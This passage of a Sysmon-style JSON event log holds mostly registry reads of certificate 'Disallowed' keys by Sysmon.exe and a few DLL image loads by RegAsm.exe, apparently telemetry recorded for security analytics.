"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": 